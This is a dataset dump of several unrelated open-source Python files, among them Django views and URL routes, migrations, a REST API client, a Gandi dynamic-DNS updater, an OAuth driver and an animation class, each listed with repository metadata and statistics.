| 47.75 | 80 | 0.477461 | 916 | 7,831 | 3.967249 | 0.146288 | 0.024216 | 0.079252 | 0.088057 | 0.724546 | 0.695377 | 0.690424 | 0.66896 | 0.623555 | 0.623555 | 0 | 0.06106 | 0.334951 | 7,831 | 163 | 81 | 48.042945 | 0.636713 | 0.099732 | 0 | 0.576 | 0 | 0 | 0.012806 | 0 | 0 | 0 | 0 | 0 | 0.128 | 1 | 0.064 | false | 0 | 0.056 | 0 | 0.128 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46aa55bc676b909ffd23d501d1007af51f171f16 | 293 | py | Python | mydict.py | zengboming/python | 13018f476554adc3bff831af27c08f7c216d4b09 | [
"Apache-2.0"
] | null | null | null | mydict.py | zengboming/python | 13018f476554adc3bff831af27c08f7c216d4b09 | [
"Apache-2.0"
] | null | null | null | mydict.py | zengboming/python | 13018f476554adc3bff831af27c08f7c216d4b09 | [
"Apache-2.0"
] | null | null | null | #unit
#mydict.py
class Dict(dict):
def __init__(self,**kw):
super(Dict,self).__init__(**kw)
def __getattr__(self,key):
try:
return self[key]
except KeyError:
raise AttributeError(r"'Dict' object han no attribute'%s'" %key)
def __setattr__(self,key,value):
self[key]=value
| 19.533333 | 67 | 0.68942 | 43 | 293 | 4.325581 | 0.604651 | 0.150538 | 0.129032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153584 | 293 | 14 | 68 | 20.928571 | 0.75 | 0.044369 | 0 | 0 | 0 | 0 | 0.122302 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46b1624f4a6a70026386fb13d4c9f4cd8b816721 | 492 | py | Python | server/petsAPI/views.py | StoyanDimStoyanov/ReactDJango | 8c30730fbd3af0064f97444a91e65a9029a1dc0f | [
"MIT"
] | null | null | null | server/petsAPI/views.py | StoyanDimStoyanov/ReactDJango | 8c30730fbd3af0064f97444a91e65a9029a1dc0f | [
"MIT"
] | null | null | null | server/petsAPI/views.py | StoyanDimStoyanov/ReactDJango | 8c30730fbd3af0064f97444a91e65a9029a1dc0f | [
"MIT"
] | null | null | null | from django.shortcuts import render
from rest_framework import generics
# Create your views here.
from petsAPI.models import Pets
from petsAPI.serializers import PetSerializer
def index(req):
return render(req, 'index.html')
class PetsListApiView(generics.ListCreateAPIView):
queryset = Pets.objects.all()
serializer_class = PetSerializer
class PetDetailsApiView(generics.RetrieveUpdateDestroyAPIView):
queryset = Pets.objects.all()
serializer_class = PetSerializer | 24.6 | 63 | 0.792683 | 54 | 492 | 7.166667 | 0.574074 | 0.056848 | 0.098191 | 0.113695 | 0.258398 | 0.258398 | 0.258398 | 0 | 0 | 0 | 0 | 0 | 0.138211 | 492 | 20 | 64 | 24.6 | 0.912736 | 0.046748 | 0 | 0.333333 | 0 | 0 | 0.021368 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.333333 | 0.083333 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
46b37f4db1428d7e3e970e352faebde87a24d82f | 7,329 | py | Python | src/bbdata/endpoint/output/objects.py | big-building-data/bbdata-python | 46335c9f8db9ceccbd795c4931db0e3041ba9a50 | [
"MIT"
] | null | null | null | src/bbdata/endpoint/output/objects.py | big-building-data/bbdata-python | 46335c9f8db9ceccbd795c4931db0e3041ba9a50 | [
"MIT"
] | null | null | null | src/bbdata/endpoint/output/objects.py | big-building-data/bbdata-python | 46335c9f8db9ceccbd795c4931db0e3041ba9a50 | [
"MIT"
] | null | null | null | import requests
from bbdata.config import output_api_url
from bbdata.util import handle_response
class Objects:
base_path = "/objects"
auth = None
def __init__(self, auth):
self.auth = auth
def get_all(self, tags=None, search=None, page=None, per_page=None,
writable=False):
"""
Get the list of accessible objects.
GET /objects
https://bbdata.daplab.ch/api/#objects_get
"""
params = {
"tags": tags,
"search": search,
"page": page,
"perPage": per_page,
"writable": writable,
}
url = output_api_url + self.base_path
r = requests.get(url, params, headers=self.auth.headers)
return handle_response(r.status_code, r.json())
def put(self, name, unit_symbol, owner, description=None):
"""
Create a new object.
PUT /objects
https://bbdata.daplab.ch/api/#objects_put
"""
json = {
"name": name,
"description": description,
"unitSymbol": unit_symbol,
'owner': owner
}
url = output_api_url + self.base_path
r = requests.put(url, json=json, headers=self.auth.headers)
return handle_response(r.status_code, r.json())
def get(self, object_id):
"""
Get an object.
GET /objects/{objectIs}
https://bbdata.daplab.ch/api/#objects__objectid__get
"""
url = output_api_url + self.base_path + "/" + str(object_id)
r = requests.get(url, headers=self.auth.headers)
# return ObjectResponse(r.json())
return handle_response(r.status_code, r.json())
def post(self, object_id, data):
"""
Edit the name and/or the description of the object.
Only the properties appearing in the body will be modified.
POST /objects/{objectId}
https://bbdata.daplab.ch/api/#objects__objectid__post
"""
# TODO The data to send isn't define in the API Docs
url = output_api_url + self.base_path + "/" + str(object_id)
r = requests.post(url, data, headers=self.auth.headers)
return handle_response(r.status_code, r.json())
def delete(self, object_id):
"""
Delete the object with the given id
POST /objects/{objectId}
https://bbdata.daplab.ch/api/#objects__objectid__delete
"""
# TODO This method is in the Postman profile but isn't in the docs
url = output_api_url + self.base_path + "/" + str(object_id)
r = requests.delete(url, headers=self.auth.headers)
return handle_response(r.status_code, r.json())
def post_disable(self, object_id):
"""
Disable this object. All associated tokens will be removed.
POST /objects/{objectId}/disable
https://bbdata.daplab.ch/api/#objects__objectid__disable_post
"""
url = output_api_url + self.base_path + "/" + str(object_id) \
+ "/disable"
r = requests.post(url, headers=self.auth.headers)
return handle_response(r.status_code, True)
def post_enable(self, object_id):
"""
Enable this object.
POST /objects/{objectId}/enable
https://bbdata.daplab.ch/api/#objects__objectid__enable_post
"""
url = output_api_url + self.base_path + "/" + str(object_id) \
+ "/enable"
r = requests.post(url, headers=self.auth.headers)
return handle_response(r.status_code, True)
def get_tokens(self, object_id, description=None):
"""
Get the list of tokens for the object. A token is used to submit new
measures (see input-api).
An optional description can be passed in the
body (max 65 characters).
GET /objects/{objectId}/tokens
https://bbdata.daplab.ch/api/#objects__objectid__tokens_get
"""
# TODO The API docs says it's possible to pass an optional description
# but it looks like it's a mistake for a GET request...
url = output_api_url + self.base_path + "/" + str(object_id) \
+ "/tokens"
json = {
"description": description
}
r = requests.get(url, json, headers=self.auth.headers)
return handle_response(r.status_code, r.json())
def put_tokens(self, object_id):
"""
Generate a new secured token.
PUT /objects/{objectId}/tokens
https://bbdata.daplab.ch/api/#objects__objectid__tokens_put
"""
# TODO The optional description should probably be added in this
# method
url = output_api_url + self.base_path + "/" + str(object_id) \
+ "/tokens"
r = requests.put(url, headers=self.auth.headers)
return handle_response(r.status_code, r.json())
def post_tokens(self, object_id, description):
"""
Edit the token's description.
POST /objects/{objectId}/tokens
https://bbdata.daplab.ch/api/#objects__objectid__tokens_post
"""
url = output_api_url + self.base_path + "/" + str(object_id) \
+ "/tokens"
json = {
"description": description
}
r = requests.post(url, json=json, headers=self.auth.headers)
return handle_response(r.status_code, r.json())
def delete_tokens(self, object_id, token_id):
"""
Revoke a token.
DELETE /objects/{objectId}/tokens
https://bbdata.daplab.ch/api/#objects__objectid__tokens_delete
"""
url = output_api_url + self.base_path + "/" + str(object_id) \
+ "/tokens"
params = {
"tokenId": token_id
}
r = requests.delete(url, params=params, headers=self.auth.headers)
return handle_response(r.status_code, True)
def put_tags(self, object_id, tags):
"""
Add tags to the object.
PUT /objects/{objectId}/tags
https://bbdata.daplab.ch/api/#objects__objectid__tags_put
"""
url = output_api_url + self.base_path + "/" + str(object_id) \
+ "/tags"
params = {
"tags": tags
}
r = requests.put(url, params=params, headers=self.auth.headers)
return handle_response(r.status_code, True)
def delete_tags(self, object_id, tags):
"""
Remove tags.
DELETE /objects/{objectId}/tags
https://bbdata.daplab.ch/api/#objects__objectid__tags_delete
"""
url = output_api_url + self.base_path + "/" + str(object_id) \
+ "/tags"
params = {
"tags": tags
}
r = requests.put(url, params=params, headers=self.auth.headers)
return handle_response(r.status_code, True)
def get_comments(self, object_id):
"""
Get all comments attached to this object. Use the /comments endpoint
for more actions.
GET /objects/{objectId}/comments
https://bbdata.daplab.ch/api/#objects__objectid__comments_get
"""
url = output_api_url + self.base_path + "/" + str(object_id) \
+ "/comments"
r = requests.get(url, headers=self.auth.headers)
return handle_response(r.status_code, r.json())
| 33.619266 | 78 | 0.592714 | 894 | 7,329 | 4.661074 | 0.147651 | 0.046076 | 0.043197 | 0.063835 | 0.62395 | 0.594912 | 0.594912 | 0.542117 | 0.542117 | 0.513799 | 0 | 0.000386 | 0.292673 | 7,329 | 217 | 79 | 33.774194 | 0.803434 | 0.301132 | 0 | 0.5 | 0 | 0 | 0.039302 | 0 | 0 | 0 | 0 | 0.018433 | 0 | 1 | 0.147059 | false | 0 | 0.029412 | 0 | 0.343137 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46b4aae481a7dcad8401c1fdb98aae95f3b590c6 | 2,207 | py | Python | api/patients/urls.py | Wellheor1/l2 | d980210921c545c68fe9d5522bb693d567995024 | [
"MIT"
] | 10 | 2018-03-14T06:17:06.000Z | 2022-03-10T05:33:34.000Z | api/patients/urls.py | Wellheor1/l2 | d980210921c545c68fe9d5522bb693d567995024 | [
"MIT"
] | 512 | 2018-09-10T07:37:34.000Z | 2022-03-30T02:23:43.000Z | api/patients/urls.py | D00dleman/l2 | 0870144537ee340cd8db053a608d731e186f02fb | [
"MIT"
] | 24 | 2018-07-31T05:52:12.000Z | 2022-02-08T00:39:41.000Z | from django.urls import path
from . import views
urlpatterns = [
path('search-card', views.patients_search_card),
path('search-individual', views.patients_search_individual),
path('search-l2-card', views.patients_search_l2_card),
path('create-l2-individual-from-card', views.create_l2_individual_from_card),
path('card/<int:card_id>', views.patients_get_card_data),
path('card/save', views.patients_card_save),
path('card/archive', views.patients_card_archive),
path('card/unarchive', views.patients_card_unarchive),
path('individuals/search', views.individual_search),
path('individuals/sex', views.get_sex_by_param),
path('individuals/edit-doc', views.edit_doc),
path('individuals/edit-agent', views.edit_agent),
path('individuals/update-cdu', views.update_cdu),
path('individuals/update-wia', views.update_wia),
path('individuals/sync-rmis', views.sync_rmis),
path('individuals/sync-tfoms', views.sync_tfoms),
path('individuals/load-anamnesis', views.load_anamnesis),
path('individuals/load-dreg', views.load_dreg),
path('individuals/load-screening', views.load_screening),
path('individuals/load-vaccine', views.load_vaccine),
path('individuals/load-ambulatory-data', views.load_ambulatory_data),
path('individuals/load-benefit', views.load_benefit),
path('individuals/load-dreg-detail', views.load_dreg_detail),
path('individuals/load-vaccine-detail', views.load_vaccine_detail),
path('individuals/load-ambulatorydata-detail', views.load_ambulatory_data_detail),
path('individuals/load-ambulatory-history', views.load_ambulatory_history),
path('individuals/load-benefit-detail', views.load_benefit_detail),
path('individuals/save-dreg', views.save_dreg),
path('individuals/save-plan-dreg', views.update_dispensary_reg_plans),
path('individuals/save-vaccine', views.save_vaccine),
path('individuals/save-ambulatory-data', views.save_ambulatory_data),
path('individuals/save-benefit', views.save_benefit),
path('individuals/save-anamnesis', views.save_anamnesis),
path('is-card', views.is_l2_card),
path('save-screening-plan', views.update_screening_reg_plan),
]
| 53.829268 | 86 | 0.752152 | 284 | 2,207 | 5.623239 | 0.169014 | 0.234815 | 0.13087 | 0.046963 | 0.032561 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00252 | 0.101042 | 2,207 | 40 | 87 | 55.175 | 0.802419 | 0 | 0 | 0 | 0 | 0 | 0.354327 | 0.275487 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.051282 | 0 | 0.051282 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46b5e33d3c7311128739c73f9d648a67b6c52c18 | 1,139 | py | Python | resolwe_bio/kb/migrations/0002_alter_field_max_length.py | JureZmrzlikar/resolwe-bio | 54cde9b293abebad2db0564c9fefa33d6d2fe835 | [
"Apache-2.0"
] | null | null | null | resolwe_bio/kb/migrations/0002_alter_field_max_length.py | JureZmrzlikar/resolwe-bio | 54cde9b293abebad2db0564c9fefa33d6d2fe835 | [
"Apache-2.0"
] | null | null | null | resolwe_bio/kb/migrations/0002_alter_field_max_length.py | JureZmrzlikar/resolwe-bio | 54cde9b293abebad2db0564c9fefa33d6d2fe835 | [
"Apache-2.0"
] | 1 | 2021-09-03T08:50:54.000Z | 2021-09-03T08:50:54.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.11 on 2016-11-15 07:06
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('resolwe_bio_kb', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='feature',
name='aliases',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=256), blank=True, default=[], size=None),
),
migrations.AlterField(
model_name='feature',
name='name',
field=models.CharField(max_length=1024),
),
migrations.AlterField(
model_name='feature',
name='sub_type',
field=models.CharField(choices=[(b'protein-coding', b'Protein-coding'), (b'pseudo', b'Pseudo'), (b'rRNA', b'rRNA'), (b'ncRNA', b'ncRNA'), (b'snRNA', b'snRNA'), (b'snoRNA', b'snoRNA'), (b'tRNA', b'tRNA'), (b'asRNA', b'asRNA'), (b'other', b'Other'), (b'unknown', b'Unknown')], max_length=20),
),
]
| 35.59375 | 302 | 0.604039 | 137 | 1,139 | 4.905109 | 0.489051 | 0.089286 | 0.111607 | 0.129464 | 0.264881 | 0.178571 | 0 | 0 | 0 | 0 | 0 | 0.034091 | 0.227392 | 1,139 | 31 | 303 | 36.741935 | 0.729545 | 0.059701 | 0 | 0.375 | 1 | 0 | 0.17603 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3b2063cf7dc483f806ac22531b14a9333116ffb | 1,092 | py | Python | radioepg/migrations/0001_initial.py | mervij/radiodns | 01543cf1e4de8de335af0301616e089c35fc67f8 | [
"Apache-2.0"
] | null | null | null | radioepg/migrations/0001_initial.py | mervij/radiodns | 01543cf1e4de8de335af0301616e089c35fc67f8 | [
"Apache-2.0"
] | 8 | 2021-05-17T10:54:28.000Z | 2021-06-08T12:02:37.000Z | radioepg/migrations/0001_initial.py | mervij/radiodns | 01543cf1e4de8de335af0301616e089c35fc67f8 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.6 on 2021-02-15 08:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Service',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('short_name', models.CharField(max_length=8)),
('medium_name', models.CharField(max_length=16)),
],
),
migrations.CreateModel(
name='Bearer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bearer_id', models.TextField()),
('cost', models.IntegerField()),
('mimeValue', models.CharField(max_length=255)),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='radioepg.service')),
],
),
]
| 32.117647 | 115 | 0.571429 | 109 | 1,092 | 5.605505 | 0.504587 | 0.03928 | 0.08838 | 0.11784 | 0.350246 | 0.258592 | 0.258592 | 0.258592 | 0.258592 | 0.258592 | 0 | 0.027167 | 0.292125 | 1,092 | 33 | 116 | 33.090909 | 0.76326 | 0.041209 | 0 | 0.384615 | 1 | 0 | 0.083254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3b45e5164e572fbde2110d62cb448013353f1cd | 1,593 | py | Python | gandyndns.py | nim65s/scripts | 2c61bd77bfca6ae6437654e43ad2bc95d611360a | [
"BSD-2-Clause"
] | 1 | 2020-12-17T09:41:42.000Z | 2020-12-17T09:41:42.000Z | gandyndns.py | nim65s/scripts | 2c61bd77bfca6ae6437654e43ad2bc95d611360a | [
"BSD-2-Clause"
] | null | null | null | gandyndns.py | nim65s/scripts | 2c61bd77bfca6ae6437654e43ad2bc95d611360a | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
'''update gandi DNS domain entry, with LiveDNS v5
Cf. https://doc.livedns.gandi.net/#work-with-domains
'''
import argparse
import ipaddress
import json
import os
from subprocess import check_output
import requests
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-v', '--verbose', action='store_true')
parser.add_argument('domain')
parser.add_argument('name')
parser.add_argument('--ip', help="defaults to ifconfig.me's return")
parser.add_argument('--api_key', help="defaults to GANDI_API_KEY env var, or the return of 'pass api/gandi'")
args = parser.parse_args()
if args.ip is None:
args.ip = requests.get('http://ifconfig.me', headers={'User-Agent': 'curl/7.61.1'}).content.decode().strip()
ip = ipaddress.ip_address(args.ip)
if args.api_key is None:
args.api_key = os.environ.get('GANDI_API_KEY', check_output(['pass', 'api/gandi'], text=True).strip())
key = {'X-Api-Key': args.api_key}
r = requests.get(f'https://dns.api.gandi.net/api/v5/domains/{args.domain}/records/{args.name}', headers=key)
r.raise_for_status()
if r.json()[0]['rrset_values'][0] == args.ip:
if args.verbose:
print('ok')
else:
type_ = 'AAAA' if isinstance(ip, ipaddress.IPv6Address) else 'A'
url = f'https://dns.api.gandi.net/api/v5/domains/{args.domain}/records/{args.name}/{type_}'
data = {'rrset_values': [args.ip]}
headers = {'Content-Type': 'application/json', **key}
r = requests.put(url, data=json.dumps(data), headers=headers)
if args.verbose:
print(r.json())
else:
r.raise_for_status()
| 32.510204 | 112 | 0.696171 | 245 | 1,593 | 4.404082 | 0.395918 | 0.038925 | 0.078777 | 0.022243 | 0.105653 | 0.105653 | 0.105653 | 0.105653 | 0.105653 | 0.105653 | 0 | 0.007168 | 0.124294 | 1,593 | 48 | 113 | 33.1875 | 0.766308 | 0.07533 | 0 | 0.176471 | 0 | 0.058824 | 0.295362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.058824 | 0.176471 | 0 | 0.176471 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d3b4eac02574fc5ff2fd374b340d31cb4dba25c1 | 3,750 | py | Python | src/sentry/models/pluginhealth.py | ayesha-omarali/sentry | 96f81a1805227c26234e6317771bc0dcb5c176ad | [
"BSD-3-Clause"
] | null | null | null | src/sentry/models/pluginhealth.py | ayesha-omarali/sentry | 96f81a1805227c26234e6317771bc0dcb5c176ad | [
"BSD-3-Clause"
] | null | null | null | src/sentry/models/pluginhealth.py | ayesha-omarali/sentry | 96f81a1805227c26234e6317771bc0dcb5c176ad | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
from sentry.db.models import (
ArrayField, BoundedPositiveIntegerField, Model, FlexibleForeignKey, sane_repr
)
from django.db import models
from jsonfield import JSONField
from django.utils import timezone
from sentry.constants import ObjectStatus
from django.utils.translation import ugettext_lazy as _
class PluginFeatures(object):
issue_basic = 'issue_basic'
issue_sync = 'issue_sync'
repository = 'repository'
class PluginHealth(Model):
__core__ = True
name = models.CharField(max_length=128, db_index=True)
features_list = ArrayField(of=models.TextField)
date_added = models.DateTimeField(default=timezone.now)
link = models.URLField(null=True, blank=True)
author = models.CharField(max_length=64)
metadata = JSONField()
status = BoundedPositiveIntegerField(
default=0,
choices=(
(ObjectStatus.VISIBLE,
_('Active')), (ObjectStatus.PENDING_DELETION, _('Pending Deletion')),
(ObjectStatus.DELETION_IN_PROGRESS, _('Deletion in Progress')),
),
db_index=True
)
class Meta:
app_label = 'sentry'
db_table = 'sentry_pluginhealth'
__repr__ = sane_repr('name')
def run_tests(self):
plugin_test = PluginHealthTest.objects.create(
plugin_id=self.id,
)
plugin_test.test_data = plugin_test.run_tests(self)
plugin_test.save()
return plugin_test
class PluginHealthTest(Model):
__core__ = True
date_added = models.DateTimeField(default=timezone.now)
plugin = FlexibleForeignKey('sentry.PluginHealth')
test_data = JSONField()
class Meta:
app_label = 'sentry'
db_table = 'sentry_pluginhealthtest'
unique_together = (('plugin', 'date_added'))
__repr__ = sane_repr('plugin', 'date_added')
def run_tests(self, plugin_health):
return {
'configure_test': self.configure_test(plugin_health),
'create_issue_test': self.create_issue_test(plugin_health),
'link_issue_test': self.link_issue_test(plugin_health),
'sync_assignment_test': self.sync_assignment_test(plugin_health),
'sync_comment_test': self.sync_comment_test(plugin_health),
'sync_status_test': self.sync_status_test(plugin_health),
'repository_test': self.repository_test(plugin_health),
}
def configure_test(self, plugin_health):
test_results = None
return test_results
def create_issue_test(self, plugin_health):
if PluginFeatures.issue_basic not in plugin_health.features_list:
return None
test_results = None
return test_results
def link_issue_test(self, plugin_health):
if PluginFeatures.issue_basic not in plugin_health.features_list:
return None
test_results = None
return test_results
def sync_assignment_test(self, plugin_health):
if PluginFeatures.issue_sync not in plugin_health.features_list:
return None
test_results = None
return test_results
def sync_comment_test(self, plugin_health):
if PluginFeatures.issue_sync not in plugin_health.features_list:
return None
test_results = None
return test_results
def sync_status_test(self, plugin_health):
if PluginFeatures.issue_sync not in plugin_health.features_list:
return None
test_results = None
return test_results
def repository_test(self, plugin_health):
if PluginFeatures.repository not in plugin_health.features_list:
return None
test_results = None
return test_results
| 32.327586 | 82 | 0.686133 | 427 | 3,750 | 5.686183 | 0.213115 | 0.103789 | 0.052718 | 0.057661 | 0.408979 | 0.380972 | 0.366145 | 0.313839 | 0.284185 | 0.284185 | 0 | 0.002102 | 0.238667 | 3,750 | 115 | 83 | 32.608696 | 0.848336 | 0 | 0 | 0.351064 | 0 | 0 | 0.078933 | 0.006133 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095745 | false | 0 | 0.074468 | 0.010638 | 0.56383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d3b76c1c0fc989bb41ad8f58fabce2395587d211 | 1,615 | py | Python | src/masonite/oauth/drivers/FacebookDriver.py | girardinsamuel/masonite-socialite | 04110601b299d8505ec453b7743124cb88047d9d | [
"MIT"
] | 1 | 2021-05-07T16:37:03.000Z | 2021-05-07T16:37:03.000Z | src/masonite/oauth/drivers/FacebookDriver.py | girardinsamuel/masonite-socialite | 04110601b299d8505ec453b7743124cb88047d9d | [
"MIT"
] | 11 | 2021-05-17T06:45:48.000Z | 2021-10-03T15:16:23.000Z | src/masonite/oauth/drivers/FacebookDriver.py | girardinsamuel/masonite-socialite | 04110601b299d8505ec453b7743124cb88047d9d | [
"MIT"
] | null | null | null | from .BaseDriver import BaseDriver
from ..OAuthUser import OAuthUser
class FacebookDriver(BaseDriver):
def get_default_scopes(self):
return ["email"]
def get_auth_url(self):
return "https://www.facebook.com/dialog/oauth"
def get_token_url(self):
return "https://graph.facebook.com/oauth/access_token"
def get_user_url(self):
return "https://graph.facebook.com/me?"
def get_request_options(self, token):
return {
"headers": {"Authorization": f"Bearer {token}", "Accept": "application/json"},
"query": {"prettyPrint": "false"},
}
def user(self):
user_data, token = super().user()
user = (
OAuthUser()
.set_token(token)
.build(
{
"id": user_data["sub"],
"nickname": user_data["nickname"],
"name": user_data["name"],
"email": user_data["email"],
"avatar": user_data["picture"],
}
)
)
return user
def user_from_token(self, token):
user_data = super().user_from_token(token)
user = (
OAuthUser()
.set_token(token)
.build(
{
"id": user_data["sub"],
"nickname": user_data["nickname"],
"name": user_data["name"],
"email": user_data["email"],
"avatar": user_data["picture"],
}
)
)
return user
| 28.333333 | 90 | 0.479257 | 149 | 1,615 | 5 | 0.322148 | 0.128859 | 0.052349 | 0.072483 | 0.448322 | 0.448322 | 0.448322 | 0.357047 | 0.357047 | 0.357047 | 0 | 0 | 0.389474 | 1,615 | 56 | 91 | 28.839286 | 0.755578 | 0 | 0 | 0.416667 | 0 | 0 | 0.18452 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145833 | false | 0 | 0.041667 | 0.104167 | 0.354167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
d3ba25fae7aacb5e43b639c41eadbd3d14fb7a48 | 303 | py | Python | ms_deisotope/qc/__init__.py | mstim/ms_deisotope | 29f4f466e92e66b65a2d21eca714aa627caa21db | [
"Apache-2.0"
] | 18 | 2017-09-01T12:26:12.000Z | 2022-02-23T02:31:29.000Z | ms_deisotope/qc/__init__.py | mstim/ms_deisotope | 29f4f466e92e66b65a2d21eca714aa627caa21db | [
"Apache-2.0"
] | 19 | 2017-03-12T20:40:36.000Z | 2022-03-31T22:50:47.000Z | ms_deisotope/qc/__init__.py | mstim/ms_deisotope | 29f4f466e92e66b65a2d21eca714aa627caa21db | [
"Apache-2.0"
] | 14 | 2016-05-06T02:25:30.000Z | 2022-03-31T14:40:06.000Z | """A collection of methods for determining whether a given spectrum is
of high quality (likely to produce a high quality interpretation)
"""
from .heuristic import xrea
from .isolation import CoIsolation, PrecursorPurityEstimator
__all__ = [
"xrea",
"CoIsolation", "PrecursorPurityEstimator"
]
| 27.545455 | 70 | 0.772277 | 34 | 303 | 6.764706 | 0.705882 | 0.095652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155116 | 303 | 10 | 71 | 30.3 | 0.898438 | 0.438944 | 0 | 0 | 0 | 0 | 0.239264 | 0.147239 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
d3bbc84b4a938b83b84adeff2d313509849c11f6 | 3,855 | py | Python | rpi_animations/message.py | Anski-D/rpi_animations_old | b019a301ba777d76e3cedc6b86359570e2c2f18b | [
"MIT"
] | null | null | null | rpi_animations/message.py | Anski-D/rpi_animations_old | b019a301ba777d76e3cedc6b86359570e2c2f18b | [
"MIT"
] | null | null | null | rpi_animations/message.py | Anski-D/rpi_animations_old | b019a301ba777d76e3cedc6b86359570e2c2f18b | [
"MIT"
] | null | null | null | from .item import Item
class Message(Item):
"""
Message feature object in the rpi_animations package.
"""
def __init__(self, group, screen_animator) -> None:
"""
Initialise Message object with sprite group and screen object. Run initial setup methods.
Args:
group (Group): Pygame sprite group to which the object will be added.
screen_animator (ScreenAnimator): Main package object controlling the animation.
"""
super().__init__(group, screen_animator)
# Store x position as float
self._x = float(self._rect.x)
# Set the flag that the message hasn't fully emerged
self._has_fully_emerged = False
def _setup_item(self) -> None:
"""
Run methods to setup the object.
Returns:
None
"""
self._set_text()
# Run parent method
super()._setup_item()
def _set_text(self) -> None:
"""
Set font, message text, and outline of text.
Returns:
None
"""
# Set font
self._font = self._settings.font
# Set the message text
self._text = self._settings.text
# Set the outline text
